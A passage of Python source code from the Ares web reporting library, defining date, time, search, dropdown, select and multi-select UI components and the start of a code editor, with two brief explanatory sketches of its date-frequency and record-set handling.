changeYear, showOtherMonths, selectOtherMonths, selectedDts, selectedCss, excludeDts, useDefault, withRemoveButton,
width, widthUnit, height, heightUnit):
if frequency is not None:
# Get the previous business day (to check that we are not on a weekend)
cobDate = datetime.datetime.today()
if len(frequency) > 1:
fType, fCount = frequency[0], frequency[2]
else:
fType, fCount = frequency[0], 0
if not fType in ['T', 'W', 'M', 'Y']:
raise Exception("%s frequence not in the list T, W, M and Y" % frequency)
if fType == 'T':
for i in range(0, int(fCount) + 1):
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
self.value = cobDate.strftime('%Y-%m-%d')
elif fType == 'M':
endMontDate = datetime.datetime(cobDate.year, cobDate.month - int(fCount), 1)
endMontDate = endMontDate - datetime.timedelta(days=1)
while endMontDate.weekday() in [5, 6]:
endMontDate = endMontDate - datetime.timedelta(days=1)
self.value = endMontDate.strftime('%Y-%m-%d')
elif fType == 'W':
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() != 4:
cobDate = cobDate - datetime.timedelta(days=1)
cobDate = cobDate - datetime.timedelta(days=(int(fCount) * 7) )
self.value = cobDate.strftime('%Y-%m-%d')
elif fType == 'Y':
endYearDate = datetime.datetime(cobDate.year - int(fCount), 1, 1)
endYearDate = endYearDate - datetime.timedelta(days=1)
while endYearDate.weekday() in [5, 6]:
endYearDate = endYearDate - datetime.timedelta(days=1)
self.value = endYearDate.strftime('%Y-%m-%d')
else:
if yyyy_mm_dd == '':
cobDate = datetime.datetime.today() - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
self.value = cobDate.strftime('%Y-%m-%d')
else:
self.value = yyyy_mm_dd
super(DatePicker, self).__init__(aresObj, {'label': label, 'date': self.value, 'selectedDts': []}, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self.color = self.getColor('baseColor', 2) if color is None else color
self.css( {"display": "inline-block", "vertical-align": "middle", "font-size": self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, "clear": "both"})
self.placeholder, self.changeMonth, self.changeYear, self.showOtherMonths, self.selectOtherMonths = placeholder, changeMonth, changeYear, showOtherMonths, selectOtherMonths
self.selectedCss, self.withRemoveButton = selectedCss, withRemoveButton
self.vals['options'] = {'dateFormat': 'yy-mm-dd', 'changeMonth': json.dumps(self.changeMonth),
'changeYear': json.dumps(self.changeYear), 'excludeDts': excludeDts,
'showOtherMonths': json.dumps(self.showOtherMonths),
'selectOtherMonths': json.dumps(self.selectOtherMonths)}
self.vals['selectedDts'] = [] if selectedDts is None else selectedDts
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
if self.htmlCode in self.aresObj.http:
self.vals['date'] = self.aresObj.http[self.htmlCode]
else:
if useDefault:
# Add to the http parameters if missing, as there is always a default value
# This parameter will never block a report by default (by using the variable useDefault)
self.aresObj.http[self.htmlCode] = self.vals['date']
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $('#%s input').val() }" % self.htmlId
def jsSetVal(self, jsVal, isPyData=False):
if isPyData:
jsVal = json.dumps(jsVal)
return '$("#%s input").datepicker("setDate", %s)' % (self.htmlId, jsVal)
def initVal(self, val): self.vals['date'] = val
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, '''
var htmlId = htmlObj.attr('id') ;
data.options.changeMonth = (data.options.changeMonth === 'true');
data.options.changeYear = (data.options.changeYear === 'true');
data.options.showOtherMonths = (data.options.showOtherMonths === 'true');
data.options.selectOtherMonths = (data.options.selectOtherMonths === 'true');
$("#"+ htmlId +" p").html(data.label) ; $("#"+ htmlId +" input").datepicker( data.options ).datepicker('setDate', data.date) ;
if (data.selectedDts.length > 0) {
var selectedDt = {} ;
data.selectedDts.forEach( function(dt) { var jsDt = new Date(dt); selectedDt[jsDt.toISOString().split('T')[0]] = jsDt; }) ;
if (data.options.excludeDts === true) {
function renderCalendarCallbackExc(intDate) {var utc = intDate.getTime() - intDate.getTimezoneOffset()*60000; var newDate = new Date(utc); var Highlight = selectedDt[newDate.toISOString().split('T')[0]]; if (Highlight) { return [false, '', '']; } else { return [true, '', '']; } } ;
$("#"+ htmlId +" input").datepicker("option", "beforeShowDay", renderCalendarCallbackExc ); }
else {
function renderCalendarCallback(intDate) {var utc = intDate.getTime() - intDate.getTimezoneOffset()*60000; var newDate = new Date(utc); var Highlight = selectedDt[newDate.toISOString().split('T')[0]]; if (Highlight) { return [true, "%s", '']; } else { return [false, '', '']; } } ;
$("#"+ htmlId +" input").datepicker("option", "beforeShowDay", renderCalendarCallback );}
} ''' % self.selectedCss, 'Javascript Object builder')
def addAttr(self, key, val, isPyData=True):
if isPyData:
val = json.dumps(val)
self.vals['options'][key] = val
def selectedDates(self, dts, css='CssLabelDates'):
self.selectedCss = self.addPyCss(css)
self.vals['selectedDts'].extend(dts)
def __str__(self):
""" Return the String representation of a Date picker object """
self.aresObj.jsOnLoadFnc.add('$("#%(htmlId)s div#show").click(function() { var visible = $("#%(htmlId)s input").datepicker("widget").is(":visible"); if( visible ) { $("#%(htmlId)s input").datepicker("hide"); } else { $("#%(htmlId)s input").datepicker("show"); $("#%(htmlId)s input").datepicker("widget").css("z-index", 600);} }); ' % {"htmlId": self.htmlId})
removeOpt = ''
if self.withRemoveButton:
removeOpt = '<div id="remove_%s" style="height:16px;color:%s;display:inline-block;margin-left:5px;font-size:16px" title="remove selection" class="far fa-calendar-times"></div>' % (self.htmlId , self.getColor('redColor', 4))
self.aresObj.jsOnLoadFnc.add('''
$('#remove_%(htmlId)s').on('click', function(event) {
$('#%(htmlId)s input').datepicker('setDate', null);
$('#%(htmlId)s input').change() ;
}) ''' % {'htmlId': self.htmlId} )
return '''
<div %s>
<p style='vertical-align:middle;padding-left:6px;color:%s;display:inline-block;margin:0;text-align:center;height:25px'></p>
<input type="text" class="datepicker form-control" style="padding:0px;display:inline;text-align:center;width:110px;height:27px">
<div id="show" style="height:32px;display:inline-block"><i style="padding-top:8px;font-size:16px" class="far fa-calendar-alt"></i></div>
%s
</div>''' % (self.strAttr(pyClassNames=self.pyStyle), self.color, removeOpt)
class TimePicker(AresHtml.Html):
references = {'Source Code': 'https://github.com/jonthornton/jquery-timepicker'}
__reqCss, __reqJs = ['timepicker'], ['timepicker']
name, category, callFnc, docCategory = 'Time Picker', 'Input', 'date', 'Advanced'
__pyStyle = ['CssDivNoBorder', 'CssDivCursor']
def __init__(self, aresObj, value, label, color, size, htmlCode):
if isinstance(value, str):
value = {"time": value}
self.label = label
if 'options' not in value:
value['options'] = {'timeFormat': 'H:i:s'}
super(TimePicker, self).__init__(aresObj, value, htmlCode=htmlCode)
self.color = self.getColor('baseColor', 2) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
if self.htmlCode in self.aresObj.http:
self.vals['date'] = self.aresObj.http[self.htmlCode]
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $('#%s input').val() }" % self.htmlId
def addAttr(self, key, val, isPyData=True):
if isPyData:
val = json.dumps(val)
self.vals['options'][key] = val
def initVal(self, val): self.vals['time'] = val
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, '''
var htmlId = htmlObj.attr('id') ;
if (data.time == '') { data.time = new Date() } ;
$("#"+ htmlId +" input").timepicker( data.options ) ;
$("#"+ htmlId +" input").timepicker( 'setTime', data.time) ;
''', 'Javascript Object builder')
def jsSetVal(self, jsVal, isPyData=False):
if isPyData:
jsVal = json.dumps(jsVal)
return '$("#%s input").timepicker("setTime", %s)' % (self.htmlId, jsVal)
def __str__(self):
return '''
<div %s>
<p style='vertical-align:middle;padding-left:6px;color:%s;font-size:%s;display:inline-block;margin:0;text-align:center;height:25px'>%s</p>
<input type="text" class="time" style="margin-top:5px;text-align:center;width:80px;height:27px" />
</div> ''' % (self.strAttr(pyClassNames=self.pyStyle), self.color, self.size, self.label)
class Search(AresHtml.Html):
references = {'Search': 'https://www.w3schools.com/howto/tryit.asp?filename=tryhow_css_anim_search'}
name, category, callFnc, docCategory = 'Search', 'Input', 'search', 'Advanced'
__pyStyle = []
def __init__(self, aresObj, text, placeholder, color, size, align, height, heightUnit, htmlCode, tooltip, extensible):
self.placeholder, self.extensible = placeholder, extensible
super(Search, self).__init__(aresObj, text, htmlCode=htmlCode, height=height, heightUnit=heightUnit)
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('') # Add the onchange method to update the breadcrumb
if self.htmlCode in self.aresObj.http:
self.vals = self.aresObj.http[self.htmlCode]
if tooltip != '':
self.tooltip(tooltip)
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def jsQueryData(self): return "{ event_val: $(this).parent().find('input').val() }"
def onDocumentLoadFnc(self): self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, "htmlObj.find('input').val(data);", 'Javascript Object builder')
@property
def eventId(self): return '$("#%s_button")' % self.htmlId
def __str__(self):
""" Return the String representation of a HTML Input object """
pyCssCls = self.addPyCss('CssSearch') if not self.extensible else self.addPyCss('CssSearchExt')
return '''
<div %(attr)s style="width:100%%;display:block">
<input class="%(pyCssCls)s" type="text" name="search" placeholder="%(placeholder)s">
<span id="%(htmlId)s_button" class="fas fa-search" style="margin-top:-30px;font-size:20px;right:30px;z-index:1;float:right;width:25px;cursor:pointer;position:absolute;color:%(blueColor)s"></span>
</div>''' % {"attr": self.strAttr(pyClassNames=self.__pyStyle), "pyCssCls": pyCssCls, "placeholder": self.placeholder, 'htmlId': self.htmlId, 'blueColor': self.getColor("blueColor", 13)}
```
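
The DatePicker constructor above resolves its `frequency` argument to the previous business day ('T'), a Friday of a prior week ('W'), a prior month end ('M') or a prior year end ('Y'). Below is a minimal standalone sketch of the 'T' and 'W' branches of that resolution, as read from the code above; the helper name and the `'T-3'` style format are assumptions, not part of the library.

```python
import datetime

def resolve_frequency(frequency, today=None):
    """Sketch of the DatePicker frequency resolution: returns a YYYY-MM-DD string."""
    cob = today or datetime.datetime.today()
    # frequency is assumed to be '<type><sep><count>', e.g. 'T-3'
    f_type = frequency[0]
    f_count = int(frequency[2:]) if len(frequency) > 1 else 0
    if f_type == 'T':
        # step back f_count + 1 business days, skipping weekends
        for _ in range(f_count + 1):
            cob -= datetime.timedelta(days=1)
            while cob.weekday() in (5, 6):
                cob -= datetime.timedelta(days=1)
        return cob.strftime('%Y-%m-%d')
    if f_type == 'W':
        # walk back to the most recent Friday, then jump back f_count weeks
        cob -= datetime.timedelta(days=1)
        while cob.weekday() != 4:
            cob -= datetime.timedelta(days=1)
        return (cob - datetime.timedelta(days=f_count * 7)).strftime('%Y-%m-%d')
    raise ValueError("only the T and W branches are sketched here")

print(resolve_frequency('T-2'))  # e.g. '2024-05-28'
```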
#### File: Lib/html/AresHtmlSelect.py
```python
import json
from ares.Lib.html import AresHtml
from ares.Lib import AresImports
# External package required
ares_pandas = AresImports.requires(name="pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
class SelectDropDown(AresHtml.Html):
""" Python interface to the Select Drop Down
"""
alias, cssCls = 'dropdown', ['btn', 'dropdown-toggle']
references = {'Bootstrap Definition': 'http://getbootstrap.com/docs/4.0/components/dropdowns/',
'W3C Definition': 'https://www.w3schools.com/bootstrap/tryit.asp?filename=trybs_ref_js_dropdown_multilevel_css&stacked=h',
'Example': 'https://codepen.io/svnt/pen/beEgre'}
__reqCss, __reqJs = ['bootstrap', 'jqueryui'], ['bootstrap', 'jquery']
__pyStyle = ['CssDivNoBorder']
name, category, callFnc, docCategory = 'DropDown Select', 'Select', 'dropdown', 'Advanced'
def __init__(self, aresObj, title, recordSet, width, widthUnit, height, heightUnit, htmlCode, scriptSrc, globalFilter):
if recordSet is None:
title = 'Languages'
super(SelectDropDown, self).__init__(aresObj, recordSet, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, htmlCode=htmlCode, globalFilter=globalFilter)
if scriptSrc is not None and scriptSrc.get('on_init', False):
self.vals = self.onInit(htmlCode, scriptSrc)
if htmlCode is not None and htmlCode in self.aresObj.http:
self.initVal(self.aresObj.http[htmlCode])
self.title, self.scriptSrc = title, scriptSrc
# To replace non alphanumeric characters https://stackoverflow.com/questions/20864893/javascript-replace-all-non-alpha-numeric-characters-new-lines-and-multiple-whi
#self.jsFrg = ["%s = CleanText($(this).text()) ;" % self.htmlId]
self.allowTableFilter, self._jsStyles = [], {"clearDropDown": True, 'dropdown_submenu': {},
'a_dropdown_item': {"width": "100%", 'font-size': '12px', 'text-decoration': 'none', 'padding-left': "10px"},
"li_dropdown_item": {"text-align": "left", 'font-size': '12px'} }
self.css( {"margin-top": "5px", "display": "inline-block"} )
for evts in ['click', 'change']:
# Add the source to the different events
self.jsFrg(evts, '''
event.stopPropagation(); $("#%(htmlId)s_button").html(data.event_val);
if ( '%(htmlCode)s' != 'None') { %(breadCrumVar)s['params']['%(htmlCode)s'] = %(jsEventVal)s } ;
''' % {'htmlId': self.htmlId, 'htmlCode': self.htmlCode, 'jsEventVal': self.jsEventVal, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
@property
def jsQueryData(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jsQueryData
:dsc: Python function to define the Javascript object to be passed in case of Ajax call internally or via external REST service with other languages
:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{event_val: %s, event_code: '%s'}" % (self.jsEventVal, self.htmlId)
@property
def jsEventVal(self): return "$(this).contents()[0].text"
def initVal(self, val, isPyData=True):
"""
:category: Javascript On-Load function
:rubric: JS
:example: >>> myObj.initVal('Test')
:dsc:
This function will set the initial value selected by the SelectDropDown component.
"""
if isPyData:
val = json.dumps(val)
self.aresObj.jsOnLoadFnc.add('$("#%(htmlId)s_button").html(%(jsVal)s)' % {"htmlId": self.htmlId, "jsVal": val})
def setDefault(self, value, isPyData=True):
"""
:category: Javascript Global variable
:rubric: JS
:example: >>> myObj.setDefault( 'btn-default' )
:dsc:
Set the default value selected to the dropdown box
"""
if isPyData:
value = json.dumps(value)
self.aresObj.jsGlobal.add("%s = %s;" % (self.htmlId, value))
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:returns: Javascript string with the function to get the current value of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return '$("#%s_button").html()' % self.htmlId
@property
def eventId(self): return "$('#%s li')" % self.htmlId
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, '''
if (jsStyles.clearDropDown) { htmlObj.empty() ; } ;
data.forEach(function(rec){
if (rec.subItems != undefined) {
var li = $('<li class="dropdown-submenu"></li>' ).css( jsStyles.dropdown_submenu );
var a = $('<a class="dropdown-item" tabindex="-1" href="#" style="display:inline-block"><span style="display:inline-block;float:left">' + rec.value + '</span></a>').css( jsStyles.a_dropdown_item )
.append('<i class="fas fa-caret-right" style="display:inline-block;float:right"></i>');
li.append( a ); var ul = $('<ul class="dropdown-menu"></ul>'); li.append( ul ); jsStyles.clearDropDown = false;
htmlObj.append( li ); %(pyCls)s(ul, rec.subItems, jsStyles) ;
} else {
if (rec.disable == true) {htmlObj.append('<li class="dropdown-item disabled"><a tabindex="-1" href="#">' + rec.value + '</a></li>');}
else {
if (rec.url == undefined) { var a = $('<a class="dropdown-item" tabindex="-1" href="#">' + rec.value + '</a>').css( jsStyles.a_dropdown_item ); }
else { var a = $('<a class="dropdown-item" tabindex="-1" href="' + rec.url + '">' + rec.value + '</a>').css( jsStyles.a_dropdown_item ); }
a.css( jsStyles.a_dropdown_item );
var li = $('<li class="dropdown-submenu"></li>' ).css( jsStyles.dropdown_submenu );
li.append( a ); htmlObj.append( li )
}
}
}) ; ''' % {"pyCls": self.__class__.__name__} )
def __str__(self):
""" String representation of a Drop Down item """
return '''
<div class="dropdown" %(cssAttr)s>
<button id="%(htmlId)s_button" class="%(class)s" style="font-weight:bold;width:100%%;font-size:12px;background-color:%(darkBlue)s;color:%(color)s" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">%(title)s<span class="caret"></span></button>
<ul class="dropdown-menu" id="%(htmlId)s" aria-labelledby="dropdownMenu"></ul>
</div> ''' % {'cssAttr': self.strAttr(withId=False), 'class': self.getClass(), 'title': self.title, 'htmlId': self.htmlId,
'darkBlue': self.getColor('blueColor', 2), 'color': self.getColor('greyColor', 0)}
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Selected: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
def to_xls(self, workbook, worksheet, cursor):
if self.htmlId in self.aresObj.http:
cellTitle = self.title if self.title != "" else 'Input'
cell_format = workbook.add_format({'bold': True})
worksheet.write(cursor['row'], 0, cellTitle, cell_format)
cursor['row'] += 1
worksheet.write(cursor['row'], 0, self.aresObj.http[self.htmlId] )
cursor['row'] += 2
class Select(AresHtml.Html):
"""
:category: Ares Component
:rubric: HTML
:type:
:dsc:
"""
# TODO: Extend the python object to handle multi select and all the cool features
cssCls = ["selectpicker show-tick"]
references = {'Example': 'https://silviomoreto.github.io/bootstrap-select/examples/',
'Bootstrap Definition': 'https://www.npmjs.com/package/bootstrap-select-v4',
'Jquery Events': 'https://www.jqueryscript.net/form/Bootstrap-4-Dropdown-Select-Plugin-jQuery.html'}
__reqCss, __reqJs = ['select'], ['select']
__pyStyle = ['CssSelect']
name, category, callFnc, docCategory = 'Simple Select', 'Select', 'select', 'Advanced'
def __init__(self, aresObj, recordSet, title, htmlCode, dataSrc, event, selected, docBlock, allSelected, label, width,
widthUnit, height, heightUnit, dfColumn, globalFilter):
""" Instantiate the object and store the selected item """
selectedVal, self.container, self.label = None, None, label
if recordSet is not None:
if issubclass(type(recordSet), ares_pandas.DataFrame) and dfColumn is not None:
if globalFilter is not None:
if globalFilter is True:
if htmlCode is None:
raise Exception("Please set a htmlCode to the %s to use this as a filter" % self.callFnc)
dataId, dataCode = id(recordSet), None
for key, src in aresObj.jsSources.items():
if src.get('dataId') == dataId:
dataCode = key
break
if not hasattr(recordSet, 'htmlCode') and dataCode is None:
dataCode = "ares_id_%s" % len(aresObj.jsSources)
recordSet = aresObj.df(recordSet, htmlCode=dataCode)
dataCode = recordSet.htmlCode
globalFilter = {'jsId': dataCode, 'colName': dfColumn}
if not dataCode in aresObj.jsSources:
aresObj.jsSources[dataCode] = {'dataId': dataId, 'containers': [], 'data': recordSet}
aresObj.jsSources[dataCode]['containers'].append(self)
recordSet = recordSet[dfColumn].unique().tolist()
elif isinstance(recordSet, set):
recordSet = list(recordSet)
elif isinstance(recordSet, dict):
recordSet = [{'value': v, 'name': k} for k, v in recordSet.items()]
if recordSet and not isinstance(recordSet[0], dict):
if docBlock is not None:
if not isinstance(docBlock, dict):
docBlock = {"id": docBlock}
docBlock['params'] = recordSet
if selected is not None:
docBlock['params'] = "%s, selected='%s'" % (docBlock['params'], selected)
recordSet = [{'value': val, 'selected': True} if val == selected else {'value': val} for val in recordSet]
elif selected is not None:
for rec in recordSet:
if rec['value'] == selected:
rec['selected'] = True
if htmlCode in aresObj.http:
if recordSet is None:
recordSet = [{'name': aresObj.http[htmlCode], 'value': aresObj.http[htmlCode]}]
for rec in recordSet:
if rec['value'] == aresObj.http[htmlCode]:
rec['selected'] = True
selectedVal = rec['value']
title = aresObj.http[htmlCode]
else:
rec['selected'] = False
if allSelected:
recordSet = [{'name': 'All', 'value': ''}] + recordSet
super(Select, self).__init__(aresObj, recordSet, htmlCode=htmlCode, docBlock=docBlock, width=width, widthUnit=widthUnit,
height=height, heightUnit=heightUnit, globalFilter=globalFilter)
if dataSrc is not None and dataSrc.get('on_init', False):
self.vals = self.onInit(htmlCode, dataSrc)
for rec in self.vals:
if rec['value'] == aresObj.http.get(htmlCode):
rec['selected'] = True
selectedVal = rec['value']
title = aresObj.http[htmlCode]
else:
rec['selected'] = False
self.title, self.htmlCode, self.dataSrc, self.selectStyle = title, htmlCode, dataSrc, []
self.aresObj.jsOnLoadFnc.add('%s.selectpicker( {liveSearch: true, style: "show-menu-arrow"} );' % self.jqId)
if htmlCode is not None:
if selectedVal is not None:
self.aresObj.jsOnLoadFnc.add("%s.val('%s')" % (self.jqId, selectedVal))
self.css({'padding': 0, 'clear': 'both', 'margin': '5px 0'})
if event is not None:
self.change(aresObj.jsPost(event['script'], event.get('htmlCodes'), event.get('success', '')))
def initVal(self, val):
"""
:category: Python function
:rubric: PY
:example: >>> myObj.initVal( 'test' )
:dsc:
Set the initial value of the select HTML component
"""
for rec in self.vals:
rec['selected'] = True if rec['value'] == val else False
@property
def jsQueryData(self):
return "{event_val: %s.val(), event_code: '%s', event_icon: %s.find(':selected').data('icon')}" % (self.jqId, self.htmlId, self.jqId)
@property
def jqId(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jqId
:dsc: Python property to get a unique Jquery ID function for a given AReS Object
:return: Javascript String of the variable used to defined the Jquery object in Javascript
"""
return "$('#%s select')" % self.htmlId
def setSelectCss(self, cssClss):
"""
:category: Table Definition
:rubric: CSS
:type: Style
:dsc:
:return: The Python Datatable object
"""
for cssCls in cssClss:
self.addPyCss(cssCls)
self.selectStyle.append(self.aresObj.cssObj.get(cssCls)().classname)
return self
def jsLoad(self, jsData, isPyData=False):
if isPyData:
jsData = json.dumps(jsData)
return "%(builder)s($('#%(htmlId)s_select'), %(jsData)s); " % { 'builder': self.__class__.__name__, 'htmlId': self.htmlId, 'jsData': jsData}
def jsLoadFromSrc(self, outKey): return '''
var params = %(script)s; var attr = {} ;
if (params.htmlCodes != undefined) {params.htmlCodes.forEach( function(code) {attr[code] = %(breadCrumbVar)s['params'][code] ; }); } ;
$.ajax({ url: "/reports/data/%(report_name)s/" + params.script, method: "POST", data: JSON.stringify(attr, null, '\t'), contentType: 'application/json;charset=UTF-8', cache: false
}).done( function(data) { var results = JSON.parse(data); %(jsLoad)s;
if (results.aresPopup != undefined) {
$('#popup').html(results.aresPopup);
$('#popup').css( {'top': '140px', 'right': '20px', 'position': 'fixed', 'padding': '10px 20px 10px 20px', 'border': '1px solid %(grey)s', 'border-radius': '5px' } ) ;
$('#popup').show() ; $('#popup').fadeOut(3000) ; }
}).fail( function(data) { });
''' % {'script': self.dataSrc, 'jsLoad': self.jsLoad('results.%s' % outKey), 'breadCrumbVar': self.aresObj.jsGlobal.breadCrumVar,
'report_name': self.aresObj.report_name, 'grey': self.getColor('greyColor', 3) }
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, ''' htmlObj.empty() ;
var categories = {} ; var cats = [] ; var selectedVals = [];
data.forEach(function(rec){
if (rec.category == undefined) { rec.category = 'None' ; }
if (rec.category in categories) { categories[rec.category].push(rec) ; }
else { categories[rec.category] = [rec] ; cats.push(rec.category) ; }}) ;
cats.forEach(function(cat){
if (cat != 'None') {
var optgroup = $('<optgroup label="'+ cat + '">' + cat + '</optgroup>') ;
categories[cat].forEach(function(rec){
if (rec.selected == true) { var selected = 'selected=true'} else { var selected = ''};
if (rec.name == undefined) { rec.name = rec.value };
if (rec.icon != undefined) { options = options + 'data-icon="'+ rec.icon +'"'};
optgroup.append('<option value="' + rec.value + '" ' + selected + '>' + rec.name + '</option>')}) ;
htmlObj.append(optgroup)}
else {
categories[cat].forEach(function(rec){
var options = ' ';
if (rec.selected == true) { var selected = 'selected'; selectedVals.push(rec.value) } else { var selected = ''};
if (rec.name == undefined) { rec.name = rec.value };
if (rec.icon != undefined) { options = options + 'data-icon="'+ rec.icon +'"'};
if (rec['data-subtext'] != undefined) { options = options + ' data-subtext="' + rec['data-subtext'] + '"' };
htmlObj.append('<option value="' + rec.value + '" ' + selected + options + '>' + rec.name + '</option>')}) ;
} }) ; htmlObj.selectpicker('refresh'); htmlObj.val(selectedVals)''')
def __str__(self):
""" Return the HTML string for a select """
containerTag = '' if self.container is None else 'data-container="%s"' % self.container
# Quick hack to be able to override the style of the title of the select
# TODO: Should be done correctly: https://developer.snapappointments.com/bootstrap-select/examples/
if len(self.selectStyle) == 0:
self.setSelectCss(['CssSelectStyle'])
selectStyle = "" if len(self.selectStyle) == 0 else 'data-style="%s"' % " ".join(self.selectStyle)
return '<div %s>%s <select %s %s title="%s"></select></div>' % (self.strAttr(pyClassNames=['CssSelect']), self.label, selectStyle, containerTag, self.title)
def to_xls(self, workbook, worksheet, cursor):
if self.htmlId in self.aresObj.http:
cellTitle = self.title if self.title != "" else 'Input'
cell_format = workbook.add_format({'bold': True})
worksheet.write(cursor['row'], 0, cellTitle, cell_format)
cursor['row'] += 1
worksheet.write(cursor['row'], 0, self.aresObj.http[self.htmlId])
cursor['row'] += 2
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Selected: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
class SelectMulti(Select):
""" Python interface to the multi select element
"""
__reqCss, __reqJs = ['select'], ['select']
references = {'Example': 'https://silviomoreto.github.io/bootstrap-select/examples/'}
name, category, callFnc, docCategory = 'Multi Select', 'Select', 'selectmulti', 'Advanced'
def __init__(self, aresObj, vals, title, maxSelections, htmlCode, dataSrc, event, selectedItems, docBlock, label,
width, widthUnit, height, heightUnit, dfColumn, globalFilter):
""" Instantiate the Drop Down button """
if vals is not None:
selectedItems = [] if selectedItems is None else selectedItems
if issubclass(type(vals), ares_pandas.DataFrame):
if globalFilter:
globalFilter = {'jsId': vals.htmlCode, 'colName': dfColumn}
vals = vals[dfColumn].unique().tolist()
      elif isinstance(vals, list) and vals and isinstance(vals[0], str):
vals = [{'value': val, 'selected': True} if val in selectedItems else {'value': val} for val in vals]
elif selectedItems:
for rec in vals:
if rec['value'] in selectedItems:
rec['selected'] = True
super(SelectMulti, self).__init__(aresObj, vals, title, htmlCode, dataSrc, event, None, docBlock, False, label, width,
widthUnit, height, heightUnit, dfColumn, globalFilter)
if dataSrc is not None and dataSrc.get('on_init', False):
recordSet = self.onInit(htmlCode, dataSrc)
self.vals = recordSet
if htmlCode in self.aresObj.http:
for val in self.aresObj.http[htmlCode].split(","):
for rec in self.vals:
if val == rec['value']:
rec['selected'] = True
self.title, self.maxSelections = title, maxSelections
if htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
# self.change('') # Add the onchange method to update the breadcrumb
def initVal(self, val):
for rec in self.vals:
rec['selected'] = True if rec['value'] in val.split(",") else False
def selected(self, vals):
""" Set default selected values """
self.aresObj.jsOnLoadFnc.add("%s.val(%s); %s.selectpicker('refresh');" % (self.jqId, json.dumps(vals), self.jqId))
def __str__(self):
""" Return the HTML string for a select """
containerTag = '' if self.container is None else 'data-container="%s"' % self.container
# Quick hack to be able to override the style of the title of the select
# TODO: Should be done correctly: https://developer.snapappointments.com/bootstrap-select/examples/
selectStyle = "" if len(self.selectStyle) == 0 else 'data-style="%s"' % " ".join(self.selectStyle)
return '''
<div %s>%s
<select %s multiple data-max-options="%s" %s data-actions-box="true" data-width="auto" title="%s"></select>
</div>''' % (self.strAttr(pyClassNames=['CssSelect']), self.label, selectStyle, self.maxSelections, containerTag, self.title)
```
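
The Select constructor above accepts several shapes for `recordSet` (a pandas DataFrame column, a set, a dict, or a plain list) and normalises them all to a list of `{'value': ..., 'selected': ...}` mappings before rendering. A small runnable sketch of that normalisation, mirroring the branches above (the helper name is mine):

```python
def normalise_recordset(record_set, selected=None):
    """Sketch of the recordSet normalisation performed by Select.__init__ above."""
    if isinstance(record_set, set):
        record_set = list(record_set)
    elif isinstance(record_set, dict):
        # dict keys become display names, values the underlying values
        record_set = [{'value': v, 'name': k} for k, v in record_set.items()]
    if record_set and not isinstance(record_set[0], dict):
        return [{'value': v, 'selected': True} if v == selected else {'value': v}
                for v in record_set]
    for rec in record_set or []:
        if rec.get('value') == selected:
            rec['selected'] = True
    return record_set

print(normalise_recordset(['EUR', 'USD', 'GBP'], selected='USD'))
# [{'value': 'EUR'}, {'value': 'USD', 'selected': True}, {'value': 'GBP'}]
```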
#### File: Lib/html/AresHtmlTextEditor.py
```python
import json
from ares.Lib.html import AresHtml
class Editor(AresHtml.Html):
name, category, callFnc, docCategory = 'Code Editor', 'Text', 'editor', 'Preformatted'
__pyStyle = ['CssDivEditor']
__reqCss, __reqJs = ['codemirror'], ['codemirror']
def __init__(self, aresObj, vals, size, language, width, widthUnit, height, heightUnit, isEditable, htmlCode):
super(Editor, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.size, self.isEditable = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, isEditable
self._jsStyles, self._jsActions, self._definedActions = {'language': language}, {}, ['run', 'load', 'auto', 'clone', 'save', 'delete']
self.css( {'font-size': self.size } )
self.addGlobalVar('%s_editor' % self.htmlId)
@property
def val(self):
""" Property to get the jquery value of the HTML object in a python HTML object """
return '%(htmlId)s_editor.getValue()' % {"htmlId": self.htmlId}
@property
def jsQueryData(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jsQueryData
:dsc:
Python function to define the Javascript object to be passed in case of Ajax call internally or via external REST service with other languages
